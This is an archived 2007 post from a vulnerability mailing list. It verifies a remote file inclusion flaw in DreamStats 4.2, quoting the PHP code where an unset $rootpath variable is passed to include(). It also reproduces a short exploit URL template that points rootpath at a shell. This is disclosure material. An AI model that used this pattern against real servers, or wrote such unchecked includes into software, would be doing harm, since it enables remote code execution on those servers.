[VIM] true: DreamStats V 4.2=(index.php)=>Remote File Include
str0ke
str0ke at milw0rm.com
Fri Feb 2 10:13:33 EST 2007
The section that matters is lines 17-22.
<index.php>
// +---------------------------------------------+
// | Copyright (c) 2004 – 2005 mnProjects |
// | http://www.mnprojects.com |
// | DreamStats System by Miguel Nunes |
// +---------------------------------------------+
error_reporting(E_ALL ^ E_NOTICE);
// D r e a m S t a t s
//
// For Call of Duty 2 version 1.0
define('in_main', true);
define('in_dreamstats', true);
if (!isset($_GET['server'])) {
################################### Includes ###################################
@include($rootpath . 'includes/ip_vers.php');
@include($rootpath . 'includes/core.php');
Thats about as vulnerable as we get.
This is for version 4.2 (4.1 and below were not downloadable), 5.0
isn't vulnerable.
/str0ke
ConTact Me:-wWw.Asb-May.Net
ScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520
Discovered By:- ThE dE at Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
******************************************************************************
index.php:-
if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
********************************************************************************
ExPlOiT:-http://www.Site.com/PaTh/upload/index.php?rootpath=[Shell]
********************************************************************************
_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now!
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/
More information about the VIM
mailing list